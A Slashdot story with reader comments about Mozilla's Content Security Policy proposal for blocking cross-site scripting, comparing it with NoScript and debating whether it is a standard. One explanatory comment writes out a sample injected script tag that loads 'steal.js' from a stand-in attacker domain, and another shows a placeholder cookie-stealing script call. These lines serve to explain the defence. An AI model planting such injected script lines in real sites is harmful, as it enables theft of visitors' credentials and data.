New Firefox Standard Aims to Combat Cross-Site Scripting

Al writes "The Mozilla Foundation is to adopt a new standard to help websites prevent cross-site scripting (XSS) attacks. The standard, called Content Security Policy, will let a website specify which Internet domains are allowed to host the scripts that run on its pages. This breaks with web browsers' tradition of treating all scripts the same way, by requiring that websites put their scripts in separate files and explicitly state which domains are allowed to run them. The Mozilla Foundation selected this implementation because it allows sites to choose whether to adopt the restrictions. 'The severity of the XSS problem in the wild and the cost of implementing CSP as a mitigation are open to interpretation by individual sites,' Brandon Sterne, security program manager for Mozilla, wrote on the Mozilla Security Blog. 'If the cost versus benefit doesn't make sense for some site, they're free to keep doing business as usual.'"
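(For illustration, the policy is delivered as an HTTP response header naming the hosts a page may load scripts from. The header name and directive syntax below follow Mozilla's pre-standard draft and may still change; the CDN domain is hypothetical:

    X-Content-Security-Policy: allow 'self'; script-src 'self' static.example-cdn.com

A CSP-aware browser receiving that header would run external scripts only from the page's own origin and from static.example-cdn.com; inline scripts and scripts from any other host would be refused. Browsers that don't recognise the header simply ignore it.)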
  • as an end user (Score:2, Insightful)

    by Anonymous Coward

    I really hope the default policy is "only allow scripts from the current domain" and "do not allow the site to override my choice".

    • Re: (Score:3, Informative)

      by seifried ( 12921 )

      It doesn't quite work that way; it's much more fine-grained. I.e., as a site owner I can say something like:

      allow /foo/bar.cgi?weird looking strings and block anything else

      so if an attacker finds a cross-site scripting flaw in say "/login.php" the client won't accept it, protecting my client, and protecting the site owner as well (bad guys aren't harvesting credentials from users, etc.).

      • by kill-1 ( 36256 )

        No, CSP doesn't work like that. You can't specify path patterns or something like that. If you have an XSS flaw on your site an attacker still can inject scripts. But the scripts won't get executed because CSP only allows external scripts from white-listed hosts.

        • by seifried ( 12921 )
          Ack I must have been thinking of mod_security, my bad. OTOH you can limit stuff by file/etc to a pretty good degree using site security policy and achieve pretty much the same aims.
        • That is the problem - a mandatory restriction that amounts to "we don't trust the html generated from our own domain".

    • Re: (Score:2, Funny)

      by sexconker ( 1179573 )

      As an end user I really hope that the sites I visit have a default policy of "we only serve up our own shit". ...

      Fuck.

      • by LDoggg_ ( 659725 )
        Javascript libraries for things like browser abstraction and animations are really nice, but they're getting kind of bulky.
        Content delivery networks like AOL and Google are hosting them for free, so it makes sense for websites to just include them and use the big guys' bandwidth.
      • by tepples ( 727027 )

        As an end user I really hope that the sites I visit have a default policy of "we only serve up our own shit".

        Then I guess you don't visit Wikipedia, eBay, or any other site that allows its subscribers to submit works to be displayed on the site.

    • Re: (Score:3, Interesting)

      by Arker ( 91948 )

      I really hope the default policy is "only allow scripts from the current domain" and "do not allow the site to override my choice".

      Noscript does this.

      Which brings me to the observation that, at least as far as I can tell from the blurb, this entire thing sounds a bit redundant in light of the ready availability of Noscript. Why not just make it part of the default firefox install instead?

      • Re:as an end user (Score:5, Insightful)

        by Spad ( 470073 ) <slashdot@ s p a d . co.uk> on Tuesday June 30, 2009 @12:53AM (#28524717) Homepage

        Because, as a user I might not know which of the 47 different domains that CNN pulls scripts from are *supposed* to be serving scripts and which are some guy trying to get my facebook account details (not that I have one or read the CNN site regularly; largely because of the number of bloody domains they pull scripts from), whereas the owners of the CNN site *will* know which domains they're supposed to be pulling scripts from and can state so to the browser.

        • Re: (Score:3, Insightful)

          by Arker ( 91948 )

          Because, as a user I might not know which of the 47 different domains that CNN pulls scripts from are *supposed* to be serving scripts and which are some guy trying to get my facebook account details (not that I have one or read the CNN site regularly; largely because of the number of bloody domains they pull scripts from), whereas the owners of the CNN site *will* know which domains they're supposed to be pulling scripts from and can state so to the browser.

          Sounds like a bug rather than a feature to me. Th

          • Re:as an end user (Score:5, Insightful)

            by xouumalperxe ( 815707 ) on Tuesday June 30, 2009 @08:01AM (#28526935)

            NoScript solves a different problem, which is that you don't trust the site. What this aims to solve is the problem of knowing what the site itself considers trustworthy, so that you're not required to issue a blanket statement of distrust: If you trust the site, you can (supposedly) trust its own trust list.

        • Hear, hear, mod up... oops, used them all up. Very informative you are, though!!!
          I would mod you up, if they could give me more than just 5 damn points!

        • The page from the primary domain refers to scripts on those other domains as a matter of trust. If CNN doesn't trust a domain's scripts, then they won't refer to them in the first place!

          OTOH if the http connection is being attacked (say from an infected system on the LAN) and references to bad domains are being injected, then that could be a real problem but not one that is solved by this new feature. Only https would prevent this attack.

      • After the stunt the noscript author pulled with adblock's filterset, I will never use it again. It simply cannot be trusted. It is malware.

  • by Red Flayer ( 890720 ) on Monday June 29, 2009 @05:18PM (#28520823) Journal
    I will still run with noscript installed because I've yet to see a good XSS-preventing implementation that will allow *me*, as a user, to easily define what sites can run scripts on the sites I visit. And when I visit a site where I need to disable noscript, I have no other tabs/browsers open.

    I'm sorry, but NO site can be trusted 100% from a user's perspective... and giving site owners the tools to help prevent XSS from their side doesn't help with the fact that users still shouldn't trust absolutely.

    The reason something like this scares me is that it lulls users into a higher level of trust... and doesn't protect them from hacked sites, or sites that choose not to implement this.

    Of course, I'm slightly paranoid. And of course, this isn't transparent to Joe Sixpack, so he's going to trust|!trust based on whatever it is he's basing it on now. And for security-critical sites like banks, this is a good thing... but I try very hard to make sure my friends & family are a bit paranoid too, so they'll take precautions.
    • I will still run with noscript installed because I've yet to see a good XSS-preventing implementation that will allow *me*, as a user, to easily define what sites can run scripts on the sites I visit

      Dude. How are *you* going to know that it is ok to run scripts on Slashdot.org that originate from slashdotscripts.com and not scriptsforslashdot.com? Even if you are a lunatic and micromanage the trusted sources of these scripts, how would selectively running any of them do you any good? I would imagine almos
      • by Red Flayer ( 890720 ) on Monday June 29, 2009 @05:52PM (#28521215) Journal

        How are *you* going to know that it is ok to run scripts on Slashdot.org that originate from slashdotscripts.com and not scriptsforslashdot.com? Even if you are a lunatic and micromanage the trusted sources of these scripts, how would selectively running any of them do you any good?

        Dare I say it?

        Site XXXX is attempting to run a script on site YYYY.
        (C)ANCEL or (A)LLOW?

        All snark aside, why would I allow either of those domains to run a script on slashdot.org? Since I trust slashdot to a certain extent, I would allow from scripts.slashdot.org. But allowing scripts from a completely different domain? No way.

        The point is that my security policy is annoying to implement. For site mybank.com I need to enable scripting. But if things were perfect, I could enable only scripts from $SUBDOMAIN.mybank.com, so I don't get hosed by scripts from $HACKERSITE.bankmy.com. And if legitimate sites are hosting their scripts on an entirely different domain... well, that would have to change. Instead I have to take an all-or-none approach, since the sites I need security the most on are the ones where I need to enable scripting. That just sucks.
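        (Under CSP as described in the article, the site itself could express roughly that restriction. A hedged sketch using the draft header syntax, with the bank domain purely hypothetical:

            X-Content-Security-Policy: allow 'self'; script-src scripts.mybank.com

        A browser honouring that policy would not fetch or execute a script injected from $HACKERSITE.bankmy.com, though the whitelist is still chosen by the site rather than by the user.)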

        • Re: (Score:2, Insightful)

          by maxume ( 22995 )

          Slashdot is currently pushing js from c.fsdn.com.

          I think you have a pretty dim view of the ecosystem (or maybe you are viewing some really marginal sites, who knows). For the most part, a given page that you visit is not going to contain malicious code that sniffs for when you have an https cookie for your banking site and then mysteriously steals all your money. I say this confidently, as I am quite certain that the bad guys are much happier with the simpler task of installing malware keyloggers.

          The only b

          • And I know that fsdn.com is also a trusted site.

            You're right that I'm not the most knowledgeable (to put it lightly) about the ecosystem. However, I think it's atrocious that I cannot easily and selectively block scripts from operating on sites I want to view. And not just for the sake of security... also for the sake of performance on older machines.
            • Re: (Score:3, Insightful)

              by Zey ( 592528 )

              And I know that fsdn.com is also a trusted site.

              Funnily enough, I know I don't want fsdn.com's content because the side bar is annoying bloatware that cripples the utility of the site. I'm very glad to have NoScript on the case, blocking it for me. (Which makes me wonder how many other horror websites there are out there whose horrible bloat I've been saved from by virtue of my browsers blocking XSS.)

          • Slashdot is currently pushing js from c.fsdn.com.

            And I'm not running any of 'em. And I never have.

        • That would be like paypal.com inexplicably using paypalobjects.com [robtex.com]! Unpossible.

        • why would I allow either of those domains to run a script on slashdot.org?

          You wouldn't. Slashdot would. This is about the site creator specifying a white list, and not about the visitor being prompted about it.

          But if things were perfect, I could enable only for scripts from $SUBDOMAIN.mybank.com, so I don't get hosed by scripts from $HACKERSITE.bankmy.com.

          Am I misunderstanding the description of this extension? Because to me this sounds exactly like what it does. You enable scripts from domains you specify. Thus, no javascript injections or form hacking will get a page to retrieve foreign scripts without the attacker being able to physically alter the document.

      • Re: (Score:2, Interesting)

        by Anonymous Coward

        That reminds me -- since recently I have to tell NoScript to allow scripts from fsdn.com in order to browse slashdot.org successfully. I *know* that FSDN is slashdot's parent company, but it doesn't seem right that I can't use slashdot's discussion interface without giving permission to all of FSDN.

        Similarly, recently I have to allow gstatic.com and/or googleapis.com to use Google-enabled websites that worked fine before.

        Like the parent post's point: it's getting harder for a user to selectively narrow per

    • Well, it irritates me to no end that there isn't a mandatory listing of all the sites that serve scripts for a given page, complete with some sort of explanation.

      I absolutely hate having to figure out which domain that I've blocked that will allow access to the content and which ones are dodgy. And further whether the site that's serving up the content is safe enough to allow.
      • If you're slightly paranoid like I am, how would you know to trust the provided list of "trusted script serving sites"?

        At some point, you need to trust *someone* to tell you who else you can trust... and that'll always be a problem.
        • by tepples ( 727027 )

          If you're slightly paranoid like I am, how would you know to trust the provided list of "trusted script serving sites"?

          The web server is telling you a list of sites that it trusts to serve scripts to be run in its pages.

      • by Jurily ( 900488 )

        What irritates me is that all the browsers I've ever heard of run everything they can by default. The only distro coming even close to something sane is Gentoo with the "restrict-javascript" USE flag with firefox (that pulls in noscript, but still does not enable it by default).

        Of course I can't know about everything, feel free to correct me.

    • Indeed, I wish noscript would allow me to whitelist domains and even specific scripts on a per-site basis. So, for example, I could whitelist maps.google.com's use of javascript from gstatic.com but not allow any other sites, like images.google.com, to pull in javascript from gstatic.com.

    • I second "yay!" for Noscript. You have no idea how tangled commercial websites are until you use noscript.
    • eBay and MySpace? (Score:3, Insightful)

      by POWRSURG ( 755318 )

      CSP is effectively server-side NoScript. And it isn't exactly new either. This has been in development as a Firefox extension for at least a year. The article mentions it being first crafted back in 2005.

      The issue I take with this article is that they suggest this feature could even possibly be integrated into eBay or MySpace. These two giants seem like the exact opposite type of market that would use this -- any site that allows users to post their own data is not going to possibly survive the wrath they w

      • Re: (Score:3, Informative)

        by kill-1 ( 36256 )

        Apparently, you have no idea what XSS means. Neither eBay nor MySpace allows the execution of user-provided scripts, for obvious reasons. Given the market share of Firefox, the big sites will implement CSP pretty soon.

    • by MikeFM ( 12491 )

      I've been suggesting a fix like this for years, but my suggested implementation let users add further limitations. It's stupid not to let users tighten controls, even if they can't make controls any weaker than the site has configured. You'll never have perfect security, but at least this is a step in the right direction.

    • by dveditz ( 11090 )

      The reason something like this scares me is that it lulls users into a higher level of trust... and doesn't protect them from hacked sites, or sites that choose not to implement this.

      This mechanism isn't intended for users -- this is a tool for site authors, to cooperate with them in enforcing their policies. The site still has to make a best effort at implementing those policies themselves to protect all their visitors using browsers that don't support CSP (which includes every officially released versio

  • Cost vs. Benefit? (Score:4, Interesting)

    by spydabyte ( 1032538 ) on Monday June 29, 2009 @05:22PM (#28520883)

    If the cost versus benefit doesn't make sense for some site, they're free to keep doing business as usual.'

    The author gave the best reason for not implementing this.

    The benefits of this, and other various security implementations, won't be seen until it's tested. The costs of testing? Way too high compared to the current cost of operation. This is a very hard proof-of-concept problem, and unless this is already built into development standards, I doubt any deployments would switch.
    Which would you take, the option which delays production for a week, or the option to just hit "next"?

    • Of course it doesn't. For the most part, sites that are vulnerable aren't made to pay for the damage that their lack of security has caused. If we forced sites to pay for their mistakes, that would change things really fast.

      The TD Ameritrade settlement for instance was an absolute joke, they ended up losing a lot of personal information and then they ended up with a slap on the wrist. It's not going to be cost effective for organizations to secure their sites as long as they're free to pass on the cost to th
  • by seifried ( 12921 ) on Monday June 29, 2009 @05:23PM (#28520897) Homepage
    Shameless self plug: I wrote about this in my column, Web security - Protecting your site and your clients [linux-magazine.com], in September of 2008, and I'm VERY glad to see this is moving forwards. It means I (as a site owner) can actually do something to protect my site and my users against flaws in my site that is relatively easy and non-intrusive (that's the key!). The thing I really love about this is that if your clients don't support site security policy, things still work; if your browser supports it but the remote web site doesn't, things still work; but if both ends support it you get a nice added layer of protection. What would be really wild is if Microsoft added support for it. Although it's "not invented here", they have been making efforts to protect users from XSS attacks in IE8 with mixed success, so who knows. You can do similar things with mod_security and outgoing filters, potentially, but it is nowhere near as simple as site security policy should be to deploy (hopefully).
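    (If the application itself can't easily be changed, the policy header can also be added at the web server. A minimal sketch for Apache with mod_headers; the header name follows the draft spec and the domain is hypothetical:

        <IfModule mod_headers.c>
            # Send the draft CSP header on every response
            Header set X-Content-Security-Policy "allow 'self'; script-src 'self' static.example.com"
        </IfModule>

    Browsers that don't understand the header ignore it, which is the graceful-degradation property described above.)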
    • I (as a site owner) can actually do something to protect my site and my users against flaws in my site that is relatively easy and non-intrusive (that's the key!).

      Unless your users run something besides Firefox.

      If MS did this we'd all be crying about how this isn't sanctioned by W3C, and it's "embraceandextend" (tag?).

      • Re: (Score:3, Informative)

        by node 3 ( 115640 )

        If MS did this we'd all be crying about how this isn't sanctioned by W3C, and it's "embraceandextend" (tag?).

        Extinguish.

        It's Embrace, Extend, Extinguish. That last E makes all the difference in the world.

  • Presumably the millions of AdSense publishers will have to enable their sites to maintain adverts...? Might hit Google revs a bit...
    • Obviously if a site does not contain one of these headers it will default to allow from all. Also called not breaking the whole internet with your new browser feature.

  • The XSS FAQ (Score:3, Informative)

    by mrkitty ( 584915 ) on Monday June 29, 2009 @05:33PM (#28521015) Homepage

    The Cross-site Scripting (XSS) FAQ http://www.cgisecurity.com/xss-faq.html [cgisecurity.com]
  • What about IE, Chrome, Opera, and Safari users? As of now this solution only benefits a small portion of users. I don't see this being widely implemented at all.
    • Re: (Score:3, Insightful)

      by hansamurai ( 907719 )

      Well, if Firefox users find it effective, then other companies will follow suit. It's just a standard Mozilla is adopting (though it seems to have been defined in-house); that won't stop anyone else from using it.

    • IE has an XSS Filter... I don't use IE enough to have bothered to investigate it, though. Otherwise, Opera, Safari, and Chrome don't seem to be doing anything special about XSS, at least not advertising it, other than patching their own vulnerabilities against a few known methods.

  • The first trap you will fall into when thinking about this is that it should be the end-all security policy and will solve our problems. It won't. That's not the intent, and it's also impossible given our diverse browser ecosystem.

    The ability to tell the browser, via out-of-band, non XSS-able information, that certain scripts should not be executed, however, is a very powerful defense in depth measure, and makes it one step harder for attackers to make an attack work.

    Security is a war of attrition. Bring it on.

  • NOT a standard (Score:3, Informative)

    by Curate ( 783077 ) <craigbarkhouse@outlook.com> on Monday June 29, 2009 @05:36PM (#28521051)
    The summary is wrong: this is NOT a standard in any way, or even a proposed standard. This is a proprietary security feature being introduced by Firefox. I'm not saying this is a bad thing (it's not), or that this won't eventually become a de facto standard (it might). But it is not a standard.
  • Standard? (Score:3, Informative)

    by pablodiazgutierrez ( 756813 ) on Monday June 29, 2009 @05:42PM (#28521113) Homepage

    More than a "Firefox standard", it seems to me that this is an extension. I'm all for it, but let's call things by their name.

  • Just like they have forced the 'humongous, scary SSL warning error' instead of the previous acceptable and understandable error message. That forced a lot of small businesses who used certificates they signed themselves to buy 3rd-party certificates from vendors. Again with this change, all small businesses will have to spend more on web development charges, because most end users will set their Firefox to the 'prevent' setting for this new feature. The 'free to do business as usual' bit is bullshit. rememb

    • Your last paragraph reminds me, hey Firefox is open source, let's just fork it!

    • Anyone doing business should have a legitimate SSL certificate for the site and not use a self-signed certificate. Anyone using a website should be wary of any business site using a self-signed certificate.

      Self-signed certificates are okay for personal servers where you know you or a friend signed the cert, but if you're doing business it is a VERY BAD IDEA to use or trust self-signed certs. Firefox's behavior is correct in this regard.

  • RFC? (Score:4, Insightful)

    by Midnight Thunder ( 17205 ) on Monday June 29, 2009 @05:47PM (#28521179) Homepage Journal

    Is this 'standard' endorsed by anyone else or written up as part of an RFC? Calling something a standard when you are the only guys doing it sounds like a certain company that was started by Bill and Paul.

    I am not trying to troll here, since I am all for the solution; I am just ensuring that this is properly documented and shared by the right entities (think W3C).

    • Re: (Score:3, Informative)

      I should have read the article first, since nowhere in the article do they mention the word 'standard'. When they do decide to make it happen, I do hope they submit the proposal to the right organisations, so as to avoid making this a one-browser standard.

    • by blair1q ( 305137 )

      Bill and Paul made about $100 billion and their bugs have become the standard that most "standards" can't dislodge.

      Anyone can proclaim a 'standard'; recall what 'RFC' stands for? It's not 'peer-reviewed and passed by governing bodies.'

      If Mozilla is saying this is how they're building it into the code base, W3C can ignore it, but it's W3C who won't be compatible with what is standard.

    • I was thinking the same thing. If this was Microsoft, Apple or even Google claiming a "new standard" based on a feature only they've adopted (and even created) they would quite rightly get chewed out. The only way something anyone does alone (especially if they're still the minority in terms of market share) could be considered a "standard" is if your attitude to language is exceptionally flexible.

  • Massive Overkill (Score:3, Informative)

    by butlerm ( 3112 ) on Monday June 29, 2009 @05:56PM (#28521259)

    This proposal looks like massive overkill to me. Implementing the restriction on inline script tags is equivalent to saying - our web developers are incompetent and naive and cannot be trusted to take basic security measures, so we feel making our web development practices more cumbersome and inefficient (if not impossible) is a healthy trade off.

    A more effective program would be to develop and promote standardized html sanitization routines for popular web development languages, so that user entered html could easily be accepted under certain restrictions. Most web logs do this already.

    Alternatively, a less draconian solution would be to allow inline scripts to execute if the script tag includes a response-specific serialization value that is also present in the HTTP headers. 64-bit values would make forging an inline script essentially impossible, because there would only be a 1/2^64 probability of a subsequent accidental match.
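    (A rough sketch of what that might look like; the header and attribute names here are hypothetical and are not part of the draft being discussed. The server picks a fresh random value for each response and states it both in a header and on its own script tags:

        X-Script-Nonce: 9f2c4b1a7d3e8c05

        <!-- Emitted by the server; the value matches the header, so the browser would run it -->
        <script nonce="9f2c4b1a7d3e8c05">initPage();</script>

        <!-- Injected by an attacker, who cannot predict the nonce; the browser would refuse it -->
        <script>stealCookies();</script>

    initPage() and stealCookies() are placeholders, not functions from the article.)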

    • our web developers are incompetent and naive and cannot be trusted to take basic security measures so we feel making our web development practices more cumbersome and inefficient (if not impossible) is a healthy trade off.

      The real question is, can YOU trust your web developers? And is this really that more cumbersome and inefficient than every other measure? It's just another tag. In fact, it is *just* a tag. It is also in the source of the problem - the web browser. You could argue everything else is a workaround, and finally we are getting help from the people responsible for inventing the problem.

      A more effective program would be to develop and promote standardized html sanitization routines for popular web development languages

      Yes, except, this is not easy, it is already being done, and it isn't quite working.

      If one tag could eliminate the risk of exte

      • by butlerm ( 3112 )

        It is not "just a tag" - it is a header that enables a mandatory restriction on inline scripts in addition to selective restrictions on other elements. And if you have incompetent web developers for a public facing site, you are likely to have much more serious problems than unfiltered user content.

        One of the serious problems with this is that many applications dynamically generate javascript on the fly. The only way to handle that under this specification would be to generate lots of little temporary files tha
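        (One common way to cope with that restriction, offered here only as a sketch and not taken from the article, is to keep the script itself static and whitelisted, and pass the per-request values out of band in markup that the static script reads; the element id and attribute names below are made up:

            <!-- Per-request data emitted as markup instead of as generated JavaScript -->
            <div id="page-config" data-user-id="12345" data-locale="en"></div>
            <!-- Static script served from a whitelisted host -->
            <script src="/static/app.js"></script>

            // in app.js
            var cfg = document.getElementById('page-config');
            var userId = cfg.getAttribute('data-user-id');

        How well that works depends on how much of the generated script is really data rather than code.)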

      • Re: (Score:2, Informative)

        by arndawg ( 1468629 )

        Hackers can just fire up a different browser, so the number of hackers this will stop are exactly ZERO.

        It's not about stopping hackers from running these scripts. It's to protect the users if a hacker has managed to insert a remote script via a form on the webpage. It protects users running Firefox if the site has implemented the tag.

  • Please don't let this become the same horror that it is with plugins.

    If you've ever tried to add an applet or anything embedded into a site that came from some other domain (like an mp3 stream), you will know what I am talking about.
    It just gets blocked, unless you have a signed certificate and other shit that you can only get for money. And then it is still a huge mess to set up.

    In my eyes this stifled web technology quite a bit.

    Additionally, what do you do, when you yourself have several domains and sub

  • So is there an official definition of "Cross-Site Scripting" somewhere? Since that phrase started to be used in scary security stories a few years ago, I've been collecting the definitions that various stories provide, and I've been a bit disappointed. Mostly, they aren't even "definitions", in the usual dictionary sense of the term. I.e., I can't use most of the purported "definitions" to decide whether what I'm looking at is an instance of the phrase. And in general, no two stories or sites seem to us

    • by TheRaven64 ( 641858 ) on Tuesday June 30, 2009 @07:30AM (#28526665) Journal

      My impression is that "Cross-Site Scripting" is an empty scare phrase that really just means "anything involving two different machines and a script -- whatever that may be".

      Cross site scripting is exactly what it sounds like; running a script from one site in another site's security sandbox (i.e. scripting across sites). The script tag allows scripts to be loaded by a page from any site. These scripts then run in the same namespace and sandbox as any other scripts on that page. It's basically the web equivalent of an arbitrary code execution vulnerability. It isn't quite as bad as the client-side version, because there is (in theory) no way of escaping from the sandbox that the browser constructs for each site.

      If you don't properly sanitise user-provided data then it's quite easy[1]. Imagine, for example, that Slashdot allowed arbitrary HTML. If it did then I could put a script tag in this post referring to a script in my domain. Your browser would then load this script and run it as if it were provided by Slashdot. If you enter your password, I could harvest it. Even if you don't, my script could send HTTP requests to Slashdot with your login credentials and post spam. If you've entered personal information in your user profile, I could harvest this.

      You probably don't have any private information on Slashdot, so it's not a particularly attractive target for identity theft, but the large number of page views means that it might be useful for spam. Imagine, for example, a cross-site scripting vulnerability being used so that everyone with excellent karma who went to the Sony story posted something written by Sony PR.

      For sites like eBay, it's much more important. These sites have full names, postal addresses, and often credit card numbers. If I can run a script in their pages' sandbox then I can access all of this information as the user enters it.

      This idea is for each domain to provide a whitelist of domains that are allowed to provide scripts (or other resources). If I persuade eBay's code to load a script from my domain then FireFox can check my domain name against the list published by eBay, see that it is not there, and refuse to run the script.

      [1] This isn't the only way of persuading a site to load your scripts, but it is the simplest to explain.
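      (A concrete sketch of the script-tag case in the footnote; all domains here are hypothetical. A comment field that echoes raw HTML lets an attacker submit something like:

          <script src="http://evil.example.net/steal.js"></script>

      steal.js then runs with the hosting page's privileges and can read that page's forms and cookies. Under the proposed policy, a header such as

          X-Content-Security-Policy: allow 'self'

      tells a CSP-aware browser that evil.example.net is not a permitted script source, so the tag is ignored even though it made it into the markup.)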

      • by jc42 ( 318812 )

        Well, yeah; I've done lots of web scripting, and I get all that. I've even written demos of the dangers, usually to try to impress on others (such as managers) why it's a potential threat to users. This hasn't usually been too successful, as shown by the fact that those people usually continue to run their browsers with scripting enabled.

        My question wasn't about how you write web scripts. My question is why you'd add a modifier like "cross-site" to it. Defining it as a script on one machine (the server)

        • Ah, I see the problem. You can't read. Let's go back to my post. I said:

          Cross site scripting is exactly what it sounds like; running a script from one site in another site's security sandbox (i.e. scripting across sites)

          You somehow read this as:

          Defining it as a script on one machine (the server) which runs on another machine (the client) adds no information, because that's how almost all web scripting works

          Note the difference between your definition and mine. My definition (shared by everyone else) involves three computers:

          • Computer 1 serves the page (site 1).
          • Computer 2 serves the script (site 2).
          • Computer 3 is the client and runs the script from site 2 in the security sandbox for site 1 (i.e. it is a cross-site script).

          If site 2 is not operated by a trusted party, then this is a cross-site scripting vulne

  • I'm a bit out of my league knowledge-wise here, but my company has a web application that would benefit very much from being able to do something in the window of another site. Why can't a browser (not the web app) be set to very specifically allow a particular web application to make use of another specified website? E.g. that would allow me to fill out a form with data from the web app, or vice versa, to get data into my MySQL database without having to fill out the data manually, which is err

    • by LDoggg_ ( 659725 )
      You can do cross-site scripting right now using JSONP. Basically, include a script with a callback function name and run an eval on the response. The object you really want as a response is passed as the parameter to your callback.
      It's extremely useful when you are able to trust the other host.

      However, if you don't trust the other host, you shouldn't be including their script in the first place. Because that script may contain something like a javascript function to send the cookies of the first domain
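      (A minimal sketch of the JSONP pattern described above; the endpoint, parameter, and callback names are hypothetical:

          <script>
            // Must be defined before the remote script loads; the response will call it.
            function handleUsers(data) {
              alert(data.users.length);
            }
          </script>
          <!-- The remote host wraps its JSON in a call to the named callback, so the
               response body looks like: handleUsers({"users": ["alice", "bob"]}) -->
          <script src="http://api.example.com/users?callback=handleUsers"></script>

      Because the response executes as script inside the including page, this only makes sense when the remote host is trusted, which is exactly the caveat above.)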
  • Next step: educate PHP users so that they have a clue about security?

  • Well, it's about time somebody did something. For years JavaScript has been an on/off affair, and it's been driving me nuts both as a web surfer and as a developer.

    They can do whatever they want for Joe Average to ensure advertisers won't complain, but please, can I have the ability to allow scripts to run only from the same domain as the originating page? Please? Just a simple checkbox will do, thank you.

    • by Dan541 ( 1032000 )

      Your suggestion is absurdly logical, hence it shall not pass.

      Why do all the good ideas get bypassed? Is it some sort of "nerd pride", that we must never do things the easy way?
